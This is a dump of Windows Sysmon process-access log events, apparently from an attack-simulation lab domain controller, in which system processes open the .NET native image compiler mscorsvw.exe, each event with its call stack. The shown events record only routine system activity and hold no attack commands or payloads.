13:21:46.570{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-D201-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.570{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456A-6000-D201-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.570{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-D201-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.445{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-D101-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.429{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456A-6000-D101-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.429{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-D101-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.382{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-D001-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.367{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456A-6000-D001-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.367{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-D001-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.179{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-CF01-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.164{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456A-6000-CF01-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.164{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-CF01-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.086{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-CE01-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.070{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456A-6000-CE01-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.070{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-CE01-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456A-6000-CD01-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.023{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456A-6000-CD01-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:46.023{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456A-6000-CD01-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.992{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456B-6000-DE01-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.992{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-DE01-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.898{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456B-6000-DD01-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.883{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456B-6000-DD01-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:47.883{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456B-6000-DD01-000000009A01}1952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 